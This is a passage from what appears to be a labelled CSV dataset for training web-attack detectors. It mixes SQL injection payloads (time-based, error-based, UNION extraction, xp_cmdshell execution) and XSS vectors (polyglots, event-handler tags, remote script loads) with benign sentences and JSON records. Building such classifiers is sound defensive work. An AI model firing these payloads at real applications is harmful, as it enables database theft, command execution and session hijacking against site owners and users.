--",2,SQLi,12891 "1' where 7353 = 7353 or 8156 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,14631 "<div id=""91"">[A]",1,XSS,9800 "-4095' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11779 select ( case when ( 8294 = 4332 ) then 1 else 8294* ( select 8294 from master..sysdatabases ) end ) --,2,SQLi,14003 """ or sleep(__TIME__)=""",2,SQLi,21373 <body onload=alert(1)>,1,XSS,9741 ( select ( case when ( 6986 = 6986 ) then 6986 else 6986* ( select 6986 from mysql.db ) end ) ),2,SQLi,14409 <content onpointerleave=alert(1)>XSS</content>,1,XSS,6476 <kbd onpointerout=alert(1)>XSS</kbd>,1,XSS,8814 "<div id=d><div style=""font-family:'sans\27\3B color\3Ared\3B'"">X</div></div> <script>with(document.getElementById(""d""))innerHTML=innerHTML</script>",1,XSS,494 "1 or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) # zcyc",2,SQLi,11715 Select mall.,3,normal,24555 "<style>:target {color:red;}</style><input id=x style=""transition:color 1s"" ontransitionend=alert(1)></input>",1,XSS,1118 <meter id=x tabindex=1 onfocusin=alert(1)></meter>,1,XSS,5639 &lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;,1,XSS,5087 &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;,1,XSS,1759 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11510 "{""id"":null,""name"":""somebody maybe anywhere""}",3,normal,27049 "Home Depot: Up to 50% off select patio furniture; up to 40% off select kitchen and bath essentials, select exclusive semi-custom cabinets and select bath lighting; up to 30% off select bath faucets and shower heads and select storage solutions; up to 25% off with appliance special buys.",3,normal,26094 "<center oncontextmenu=""alert(1)"">test</center>",1,XSS,6355 Join for lunch.,3,normal,23015 He also edited Gregory Lewis Way's translation of select Fabliaux in 1796.,3,normal,26129 "{""id"":null,""firstName"":""Veliani"",""lastName"":""Sanjaya"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27481 "{""id"":null,""firstName"":""志源"",""lastName"":""志源"",""address"":""96541 W Central Blvd"",""city"":""176"",""telephone"":""914707373""}",3,normal,27597 -5286' or 6783 = 1233,2,SQLi,21656 "<keygen onkeypress=""alert(1)"" contenteditable>test</keygen>",1,XSS,3646 1 ) ) rlike sleep ( 5 ) and ( ( 8773 = 8773,2,SQLi,19191 1' ) rlike ( select ( case when ( 2671 = 4485 ) then 1 else 0x28 end ) ) and ( 'ezco' like 'ezco,2,SQLi,14374 "1"" ) ) ) and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12025 Where's the theater?,3,normal,23544 "1' or ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8113 = 8113,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and 'qvyq' like 'qvyq",2,SQLi,11209 "<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC="";javas]]>;<;![CDATA[cript:alert(';XSS';);"";>;]]>;",1,XSS,1698 -1432 order by 1#,2,SQLi,22100 "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>",1,XSS,2297 1' ) as ncou where 9166 = 9166 and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) --,2,SQLi,14818 "1' in boolean mode ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14720 "<acronym oncontextmenu=""alert(1)"">test</acronym>",1,XSS,5941 "In ordinary times the president may be almost compared to the managing clerk in a large business establishment, whose chief function is to select his subordinates, the policy of the concern being in the hands of the board of directors.",3,normal,26007 -9644 ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( 5616 = 5616,2,SQLi,9992 "1"" ) ) as tkmd where 3415 = 3415 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,11057 "<keygen draggable=""true"" ondragleave=""alert(1)"">test</keygen>",1,XSS,3315 -6030%' ) or 3038 = 3038,2,SQLi,21196 "-2007' where 9157 = 9157 union all select 9157,9157,9157,9157,9157,9157,9157,9157,9157#",2,SQLi,14848 Let's choose a destination for our road trip.,3,normal,23689 <script>alert(1)//,1,XSS,9787 "=+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5)))+",2,SQLi,9919 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></blink>",1,XSS,217 primary,3,normal,23133 "<style>:target {color: red;}</style><ins id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></ins>",1,XSS,1074 <html onpointerup=alert(1)>XSS</html>,1,XSS,8685 "Except in the case of a select few, Irving's preaching awakened little interest among the congregation of Chalmers, Chalmers himself, with no partiality for its bravuras and flourishes, comparing it to ""Italian music, appreciated only by connoisseurs""; but as a missionary among the poorer classes he wielded an influence that was altogether unique.",3,normal,26211 "1"" and 7533 = 7533 and ""dqjp"" = ""dqjp",2,SQLi,19891 <pre id=x tabindex=1 onfocus=alert(1)></pre>,1,XSS,7009 -7600' or 7684 = 3181#,2,SQLi,21517 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))--",2,SQLi,13403 Insert card.,3,normal,23025 "1 ) ) union all select null,null--",2,SQLi,20172 "<rp onmouseleave=""alert(1)"">test</rp>",1,XSS,8655 Filter the pool.,3,normal,22836 "1"" ) and 3580 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,13729 1' rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) and 'obwn' = 'obwn,2,SQLi,15408 "javascript:alert(1)//\"";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*""/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//--><FRAME SRC=""javascript:alert(1);""></textarea></style></iframe></noscript></noembed></template></option></select></script><img src=x onerror=alert(1)></title><script>alert(1)</script><img src=0 onerror=alert(1)><img src=x:x onerror=alert(1)> alert(1)//",1,XSS,27 "{""id"":null,""name"":""Lickitung""}",3,normal,26828 "1"" ) ) or row ( 1045,7562 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 1045 = 1045,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) and ( ( ""aall"" like ""aall",2,SQLi,10625 <embed onpointermove=alert(1)>XSS</embed>,1,XSS,7662 "select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ""rukx"" like ""rukx",2,SQLi,13425 "<div id=""43""><?xml version=""1.0"" standalone=""no""?>",1,XSS,5692 alert(document.domain),1,XSS,9747 But obscurity implies that a meme exists within a select community.,3,normal,26311 The controller is even compatible with Windows PC and select tablets.,3,normal,25471 where,3,normal,23109 "1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and 'usnh' like 'usnh",2,SQLi,12745 foo\’; alert(document.cookie);//’;,1,XSS,9174 "1' ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and 'efpc' like 'efpc",2,SQLi,10871 "1"" ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ""wfwg"" like ""wfwg",2,SQLi,11932 "setTimeout(function() {var element = document.getElementById('exampleElement');element.innerHTML += ' Appended Text';}, 5000); ",1,XSS,632 "elt ( 5098 = 2728,1 )",2,SQLi,21638 "Smart, Smart Plus and Select are the three class options.",3,normal,25547 <svg onpointerover=alert(1)>XSS</svg>,1,XSS,8710 Select a wine to pair with the meal.,3,normal,24075 <isindex onpointerover=alert(1)>XSS</isindex>,1,XSS,6617 "<samp draggable=""true"" ondrag=""alert(1)"">test</samp>",1,XSS,5245 "<div draggable=""true"" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta>",1,XSS,1104 1'|| ( select 'brsr' where 5458 = 5458,2,SQLi,19684 -4057' ) order by 1#,2,SQLi,21760 <script>Object.prototype.innerHTML = '<img/src/onerror=alert(1)>';</script>,1,XSS,2206 "{""id"":null,""firstName"":""Cammie"",""lastName"":""Sim"",""address"":""15 Woodlands Loop, #01-15"",""city"":""380"",""telephone"":""2371752284""}",3,normal,27330 "1%"" ) ) or 5286 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ""%"" = """,2,SQLi,12927 "1' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( 'uwbh' = 'uwbh",2,SQLi,11501 "1' ) ) as ylyq where 2953 = 2953 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11332 "1 ) as jqbv where 8172 = 8172 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13791 "1"" ) ) ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) and ( ( ( ""zgoy"" like ""zgoy",2,SQLi,15088 "1' and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and 'dphz' = 'dphz",2,SQLi,12536 "{""id"":null,""firstName"":""Siew"",""lastName"":""Peiying"",""address"":""78 Maryland Dr #146"",""city"":""906"",""telephone"":""788811156""}",3,normal,27610 "-1275"" union all select 7861,7861,7861,7861,7861#",2,SQLi,18615 -6218' ) ) or 2236 = 4469#,2,SQLi,20966 1' and ( 3020 = 3020 ) *6703,2,SQLi,20814 """));waitfor delay '0:0:__TIME__'--",2,SQLi,20126 "1' ) union all select null,null,null,null,null,null,null--",2,SQLi,17380 -3634%' ) ) or 2671 = 2434,2,SQLi,20993 Plant some fragrant herbs in your garden.,3,normal,22942 1' ) ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ( 'ckmm' like 'ckmm,2,SQLi,14914 "<div draggable=""true"" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote>",1,XSS,721 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual ) +'",2,SQLi,13863 <img id=x tabindex=1 onactivate=alert(1)></img>,1,XSS,6157 "-3436 ) or elt ( 1032 = 1032,3623 )",2,SQLi,20117 "select pg_sleep ( 5 ) and ""ilyw"" like ""ilyw",2,SQLi,19211 select sleep ( 5 ) and ( ( ( 'thqr' like 'thqr,2,SQLi,18974 "<image draggable=""true"" ondragend=""alert(1)"">test</image>",1,XSS,4027 Select the best photo.,3,normal,22624 "<abbr onmouseout=""alert(1)"">test</abbr>",1,XSS,8227 "select * from users where id = 1 or "",&"" or 1 = 1 -- 1",2,SQLi,17932 1 ) ) as eveb where 7567 = 7567,2,SQLi,20472 "1"" where 9521 = 9521 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) --",2,SQLi,15517 1' ) rlike sleep ( 5 ) and ( 'boto' = 'boto,2,SQLi,19200 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--",2,SQLi,16117 "1' where 4245 = 4245 union all select null,null--",2,SQLi,18630 "<dir oncopy=""alert(1)"" contenteditable>test</dir>",1,XSS,5820 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( ( 'nbsf' like 'nbsf",2,SQLi,11980 "<listing draggable=""true"" ondrag=""alert(1)"">test</listing>",1,XSS,3868 Retrieve data where applicable.,3,normal,23348 <font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus>,1,XSS,2747 "1' ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( 'tnfm' like 'tnfm",2,SQLi,11891 "-4983%"" ) or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""%"" = """,2,SQLi,10367 I need to decide where to go for a coffee break.,3,normal,23947 "1'|| ( select 'kbvq' where 9279 = 9279 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) ) ||'",2,SQLi,11974 "Choose, select.",3,normal,24782 "1%"" ) ) and sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19635 "&lt;BODY BACKGROUND=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,4216 1' ) ) as fcjk where 7755 = 7755,2,SQLi,20331 "1"" ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( ""tabq"" like ""tabq",2,SQLi,12120 "-4223' ) ) ) union all select 7913,7913,7913,7913,7913,7913,7913,7913,7913,7913#",2,SQLi,15217 """ and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,19667 "<style>@keyframes x{}</style><isindex style=""animation-name:x"" onanimationstart=""alert(1)""></isindex>",1,XSS,1403 "1%"" ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ""%"" = """,2,SQLi,12852 "-6747"" or 9323 = 9323#",2,SQLi,21394 "<iframe/src=""data:text/html,<svg &#111;&#110;load=alert(1)>"">",1,XSS,3255 "The Baluch character is influenced by its environment as much as by its origin, so that it is impossible to select any one section of the general community as affording a satisfactory sample of popular Baluch idiosyncrasies.",3,normal,25487 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#",2,SQLi,19069 "<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>",1,XSS,2160 <mark onpointerup=alert(1)>XSS</mark>,1,XSS,8581 "1"" union all select null,null,null,null,null,null,null,null--",2,SQLi,17082 Let's decide where to go for a relaxing break.,3,normal,23952 "<strike onmouseover=""alert(1)"">test</strike>",1,XSS,7014 Where's the mountain?,3,normal,23522 "1' ) ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ( 'sqnk' = 'sqnk",2,SQLi,10221 "<span onbeforepaste=""alert(1)"" contenteditable>test</span>",1,XSS,3843 "1"" ) ) ) and 7533 = 7533 and ( ( ( ""alvd"" like ""alvd",2,SQLi,18223 1 ) where 9860 = 9860 and 4443 = 4111--,2,SQLi,19581 "-1303' union all select 4840,4840#",2,SQLi,20156 "1' ) ) ) and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and ( ( ( 'txwf' = 'txwf",2,SQLi,11873 <shadow id=x tabindex=1 onbeforedeactivate=alert(1)></shadow><input autofocus>,1,XSS,2102 key,3,normal,23134 "<style>@keyframes x{}</style><html style=""animation-name:x"" onanimationend=""alert(1)""></html>",1,XSS,1675 "1' ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( 'pcim' = 'pcim",2,SQLi,10317 <script ^__^>alert(String.fromCharCode(49))</script ^__^,1,XSS,4215 "<small onmousedown=""alert(1)"">test</small>",1,XSS,7483 "1' ) and elt ( 4249 = 4249,7259 ) and ( 'bkag' = 'bkag",2,SQLi,17956 "-7611 ) as tuje where 6101 = 6101 union all select 6101,6101,6101,6101,6101,6101,6101,6101--",2,SQLi,14586 Specify filters where valid.,3,normal,23337 "1%"" ) ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( ( ""%"" = """,2,SQLi,11539 "<object data=""javascript:alert(XSS)"">",1,XSS,8550 -5534 or 1983 = 5721#,2,SQLi,21599 select * from users where id = '1' *$ . or 1 = 1 -- 1',2,SQLi,17869 "1%' ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( '%' = '",2,SQLi,14847 "1"" ) ) ) and elt ( 1750 = 7826,7826 ) and ( ( ( ""qcro"" = ""qcro",2,SQLi,16947 -1396 where 5838 = 5838 or 9323 = 9323#,2,SQLi,19628 "1%' ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,16387 Update your profile with the new picture.,3,normal,22895 "1%' ) ) or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( '%' = '",2,SQLi,14633 "union ( select NULL, NULL, ( select @@version ) ) --",2,SQLi,18159 AND 7300=7300 AND ('pKlZ'='pKlZ,2,SQLi,20385 1 ) ) as ewlg where 3722 = 3722 rlike sleep ( 5 ) --,2,SQLi,18180 <x onmouseup=alert(1)>click this!,1,XSS,9391 1'+ ( select 'rqok' where 5074 = 5074 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) +',2,SQLi,10094 -2039' ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ),2,SQLi,10884 select * from users where id = 1 +$+ or 1 = 1 -- 1,2,SQLi,18424 "<style></style\x0D<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,2007 "1' ) union all select null,null#",2,SQLi,20301 "1"" or sleep ( 5 ) and ""fbuo"" like ""fbuo",2,SQLi,19645 -8028%' ) ) ) or 5042 = 5214,2,SQLi,20836 "ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#",2,SQLi,15911 "-4385%' ) ) union all select 6694,6694,6694,6694,6694,6694,6694,6694,6694,6694#",2,SQLi,15257 "1'+ ( select 'tzyz' where 4912 = 4912 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,13435 <nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus>,1,XSS,2259 Where's your SQL responsibility?,3,normal,23433 -4171' ) union all select 6136#,2,SQLi,20481 <output id=x tabindex=1 onfocus=alert(1)></output>,1,XSS,5576 <ol onpointerdown=alert(1)>XSS</ol>,1,XSS,9086 "{""id"":null,""firstName"":""Helen"",""lastName"":""Luo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26958 <dd id=x tabindex=1 onbeforeactivate=alert(1)></dd>,1,XSS,5357 <object onerror=javascript:javascript:alert(1)>,1,XSS,6095 <svg><article onload=alert(1)></article>,1,XSS,7938 Select send.,3,normal,24703 "<style>@keyframes x{}</style><header style=""animation-name:x"" onanimationend=""alert(1)""></header>",1,XSS,1521 """Ask Dr. Ruth"" and ""Hesburgh"" premiere May 3 in select theaters.",3,normal,26467 "<style>:target {color:red;}</style><li id=x style=""transition:color 1s"" ontransitionend=alert(1)></li>",1,XSS,1380 admin' or 1 = 1/*,2,SQLi,22087 ", exec master..xp_cmdshell 'ping 10.10.1.2'--",2,SQLi,18995 "1"" ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and ( ( ""zlwb"" = ""zlwb",2,SQLi,15230 1%' or sleep ( 5 ) #,2,SQLi,21838 admin' or '1' = '1,2,SQLi,22036 Select the perfect wedding invitation.,3,normal,24412 select ( case when ( 2140 = 5325 ) then 2140 else 2140* ( select 2140 from information_schema.character_sets ) end ) #,2,SQLi,13224 Select your symbol.,3,normal,24901 "<a href=""&#x0000006a;avascript:alert(1)"">XSS</a>",1,XSS,5844 <object onpointermove=alert(1)>XSS</object>,1,XSS,7125 "-8436' ) as frmf where 7225 = 7225 or make_set ( 9354 = 9354,7185 ) --",2,SQLi,16235 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( ( ""mofa"" like ""mofa",2,SQLi,12844 "<? foo=""><x foo='?><script>alert(91)</script>'>"">",1,XSS,5834 )alert(1);//,1,XSS,9824 -6755 ) or 9323 = 9323#,2,SQLi,21303 "1"" where 2512 = 2512 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12742 ORDER BY 27#,2,SQLi,22321 "javascript:""/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \"" onmouseover=/*<svg/*/onload=alert()//>",1,XSS,524 ))) RLIKE SLEEP(5) AND (((1337=1337,2,SQLi,20015 "1"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""jozh"" = ""jozh",2,SQLi,15396 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></data>",1,XSS,236 "1' ) ) ) or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'vjhw' like 'vjhw",2,SQLi,12204 "1"" where 4298 = 4298 order by 1--",2,SQLi,20204 "<spacer oncontextmenu=""alert(1)"">test</spacer>",1,XSS,6320 "1' ) ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'msjw' like 'msjw",2,SQLi,12016 The Technology Select Sector SPDR ETF (XLK) closed 0.5 percent lower.,3,normal,25369 "perl -e &#039;print \"";<;IMG SRC=java\0script:alert(\"";XSS\"";)>;\"";;&#039; >; out",1,XSS,1950 "<ul oncut=""alert(1)"" contenteditable>test</ul>",1,XSS,6363 "{""id"":null,""name"":""press""}",3,normal,26815 "These deals change all the time, but they always let you book select itineraries on select dates for a lot fewer miles than you would normally pay.",3,normal,25329 "-4419%"" ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11708 or true,2,SQLi,22513 "select * from users where id = 1 -@<@ union select null,version ( ) -- 1",2,SQLi,15951 "Get an extra 15% off select furniture by Corvus, an extra 10% off select furniture by Christopher Knight Home, and an extra 603% off select rugs by Nourison.",3,normal,26151 <tbody id=x tabindex=1 ondeactivate=alert(1)></tbody><input id=y autofocus>,1,XSS,2226 Hormel said its products launched this week in select retail outlets.,3,normal,26090 1 ) where 1203 = 1203 rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #,2,SQLi,15270 "1"" ) ) ) and make_set ( 7809 = 9564,9564 ) and ( ( ( ""jggk"" like ""jggk",2,SQLi,16233 "<dt onkeydown=""alert(1)"" contenteditable>test</dt>",1,XSS,5573 "<samp draggable=""true"" ondragend=""alert(1)"">test</samp>",1,XSS,4525 "<noframes onmouseleave=""alert(1)"">test</noframes>",1,XSS,5795 1' ) as wvvo where 4288 = 4288,2,SQLi,20642 <body id=x tabindex=1 onactivate=alert(1)></body>,1,XSS,5740 "1%"" ) ) union all select null,null,null,null#",2,SQLi,19032 <article id=x tabindex=1 onfocusin=alert(1)></article>,1,XSS,4730 "<div/onmouseover='alert(1)'> style=""x:"">",1,XSS,7821 "<wbr onmouseup=""alert(1)"">test</wbr>",1,XSS,8862 "{""id"":null,""name"":""very put direct""}",3,normal,27510 ORDER BY 11,2,SQLi,22369 1' ) ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ) and ( ( 'glfq' like 'glfq,2,SQLi,15299 Let's explore where the city lights shine.,3,normal,23672 "<a href=""\x07javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2439 admin'/*,2,SQLi,22476 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17",2,SQLi,14111 Insert memory card.,3,normal,22778 "1'+ ( select sfuq where 8094 = 8094 procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) ) +'",2,SQLi,12013 "<spacer onbeforepaste=""alert(1)"" contenteditable>test</spacer>",1,XSS,3169 "1"" ) ) as luon where 4676 = 4676 rlike sleep ( 5 ) #",2,SQLi,18217 Select wrap.,3,normal,24697 "-2860"" ) ) order by 1#",2,SQLi,21501 "1, ( select ( case when ( 5154 = 5154 ) then 1 else 5154* ( select 5154 from master..sysdatabases ) end ) )",2,SQLi,13776 "select * from users where id = 1 or 1#""; union select 1,version ( ) -- 1",2,SQLi,15944 "1"" ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""ksxz"" = ""ksxz",2,SQLi,14051 <ul id=x tabindex=1 onfocusin=alert(1)></ul>,1,XSS,7019 "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ""%"" = """,2,SQLi,13410 "1"" ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,16022 "1 where 7757 = 7757 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,12665 Select the perfect attire for the occasion.,3,normal,24254 "<tr draggable=""true"" ondragenter=""alert(1)"">test</tr>",1,XSS,4947 "1'+ ( select 'zkum' where 5161 = 5161 union all select null,null,null,null#",2,SQLi,15673 "1' ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( 'ykoz' = 'ykoz",2,SQLi,12261 "<hr draggable=""true"" ondrag=""alert(1)"">test</hr>",1,XSS,6048 <tr onpointerout=alert(1)>XSS</tr>,1,XSS,9230 "<div onpaste=""alert(1)"" contenteditable>test</div>",1,XSS,5587 Fetch information where applicable.,3,normal,23345 "<u onbeforecut=""alert(1)"" contenteditable>test</u>",1,XSS,5592 &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;,1,XSS,1230 1'|| ( select 'ydvg' from dual where 7108 = 7108,2,SQLi,18715 Calculate totals where necessary.,3,normal,23272 "1 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) -- cbsd",2,SQLi,13365 "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and ( ( ( 'juhi' like 'juhi",2,SQLi,13357 AND 1 = utl_inaddr.get_host_address ( ( SELECT SYS.LOGIN_USER FROM DUAL ) ) AND 'i' = 'i,2,SQLi,14767 <time onpointerover=alert(1)>XSS</time>,1,XSS,8247 Select the ideal spot for a picnic.,3,normal,24159 "select * from users where id = 1 or \<\ union select 1,@@VERSION -- 1",2,SQLi,16261 "<div 